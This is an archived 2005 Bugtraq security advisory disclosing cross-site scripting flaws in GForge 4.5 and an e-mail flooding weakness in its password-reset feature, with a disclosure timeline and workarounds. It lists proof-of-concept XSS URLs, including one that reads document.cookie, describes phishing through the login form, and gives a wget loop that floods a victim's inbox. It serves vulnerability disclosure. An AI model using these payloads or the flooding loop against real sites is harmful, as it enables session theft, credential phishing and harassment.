[39992] in bugtraq
Cross Site Scripting vulnerabilities in GForge
daemon@ATHENA.MIT.EDU (Joxean Koret)
Thu Jul 28 21:00:09 2005
From: Joxean Koret <joxeankoret@yahoo.es>
To: bugtraq@securityfocus.com,
Full Disclosure <full-disclosure@lists.netsys.com>,
Secunia <vuln@secunia.com>,
Security Tracker <bugs@securitytracker.com>, core@gforge.org,
tim@perdue.net
Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="=-6sKVWz4CJ5LX4kknxSeW"
Date: Wed, 27 Jul 2005 22:37:16 +0200
Message-Id: <1122496636.26878.2.camel@localhost.localdomain>
Mime-Version: 1.0
--=-6sKVWz4CJ5LX4kknxSeW
Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable
---------------------------------------------------------------------------
Various Vulnerabilities in GForge=20
---------------------------------------------------------------------------
Author: Jose Antonio Coret (Joxean Koret)
Date: 2005
Location: Basque Country
---------------------------------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
GForge - 4.5 (Current)
GForge has tools to help your team collaborate, like message forums and=20
mailing lists; tools to create and control access to Source Code
Management=20
repositories like CVS and Subversion. GForge automatically creates a
repository=20
and controls access to it depending on the role settings of the project.
Web : http://gforge.org/
---------------------------------------------------------------------------
A) Cross Site Scripting Vulnerabilities
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1.- In the Forum Module:
http://[target]/forum/forum.php?forum_id=3D"><script>alert('hi')</script>
http://[target]/forum/forum.php?group_id=3D"><script>alert('hi')</script>
(NOTE: The group_id parameter is ALWAYS vulnerable.)
2.- In the Task Module:
http://[target]/pm/task.php?func=3Ddetailtask&project_task_id=3D"><h1>hi!</=
h1>&group_id=3D1&group_project_id=3D3
3.- In the Snippets Module:
http://[target]/snippet/detail.php?type=3Dsnippet&id=3D21"><iframe%
20src=3Dhttp://www.playboy.com></iframe><font%20size=3D"
4.- In the search engine:
To try it simply enter any valid XSS test such as "><h1>hi!!!</h1> in
the=20
search field and press enter or try the following URL:
http://[target]/search/?type_of_search=3Dsoft&words=3D%22%3E%3Ch1%3EHi%21%
3C%2Fh1%3E%3Ciframe+src%3Dhttp%3A%2F%2Fslashdot.org%3E%3C%2Fiframe%
3E&Search=3DSearch
5.- In other modules:
http://[target]//frs/admin/qrs.php?group_id=3D"><script>alert(document.cook=
ie)</script>
http://[target]/notepad.php?form=3Dparent;%0d%0a-->%0d%
0a</script><body><h1>hi!</h1></body></html><!--
NOTE: (rows, cols and wrap paremeter are also vulnerables).
6.- In the Login Form:
The login form is also vulnerable to XSS (Cross Site Scripting) attacks.
This may
be used to launch phising attacks by sending HTML e-mails (i.e.: saying
that you need=20
to upgrade to the latest GForge version due to a security problem) and
putting in the=20
e-mail an HTML link that points to an specially crafted url that inserts
an html form=20
in the GForge login page and when the user press the login button,
he/she send the=20
credentials to the attackers website.
POC. To "play" with this, simply go to the login page and insert in the
login field=20
then following text:=20
"><iframe src=3Dhttp://www.playboy.com></iframe><font size=3D"
B) E-Mail Flood
~~~~~~~~~~~~~~~
The 'forgot your password?' feature allows a remote user to load a
certain URL to=20
cause the service to send a validation e-mail to the specified user's
e-mail address.=20
There is no limit to the number of messages sent over a period of time,
so a remote=20
user can flood the target user's secondary e-mail address. E-Mail Flood,
E-Mail bomber.
The following is a "Proof Of Concept" of this vulnerability:
[joxean@nemobox]$ while [ true ]; do
> wget http://[target]/account/lostpw.php?loginname=3Djoxean
> done
The "pending account" confirmation e-mail is also vulnerable so, a
mailicious user can
flood any e-mail box even if they are not GForge registered users.
The fix:
~~~~~~~~
There is no fix at the moment.
Workarounds:
~~~~~~~~~~~~
There are no workarounds except by using a method to automagically catch
the XSS
request such as WASP (available via CVS at
https://savannah.nongnu.org/wasp) or=20
mod_security (available at http://www.modsecurity.org/) for Apache Web
Servers.
Timeline:
~~~~~~~~~
25-Apr-2005 Vendor contacted
25-Apr-2005 Initial Vendor response (without interest on fixing bugs)
25-Apr-2005 Response to vendor
04-Jun-2005 One XSS bug (not discovered by me) closed without a fix
23-Jun-2005 Vendor RE-contacted (No response)
27-Jul-2005 Advisory released
Disclaimer:
~~~~~~~~~~~
The information in this advisory and any of its demonstrations is
provided
"as is" without any warranty of any kind.
I am not liable for any direct or indirect damages caused as a result of
using the information or demonstrations provided in any part of this
advisory.=20
---------------------------------------------------------------------------
Contact:
~~~~~~~~
Joxean Koret at joxeanpiti<<<<<<<<@>>>>>>>>yah00<<<<<<dot>>>>>es
--=-6sKVWz4CJ5LX4kknxSeW
Content-Type: application/pgp-signature; name=signature.asc
Content-Description: Esta parte del mensaje =?ISO-8859-1?Q?est=E1?= firmada
digitalmente
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.1 (GNU/Linux)
iD8DBQBC5/B8U6rFMEYDrlERAgw0AJwOKNlbAoHSdOCVUFwnkXsdPNAsmgCfa53A
1ERx5UPoYDgIcWJ2ayw6tKw=
=qOdK
-----END PGP SIGNATURE-----
--=-6sKVWz4CJ5LX4kknxSeW--
______________________________________________
Renovamos el Correo Yahoo!
Nuevos servicios, mas seguridad
http://correo.yahoo.es
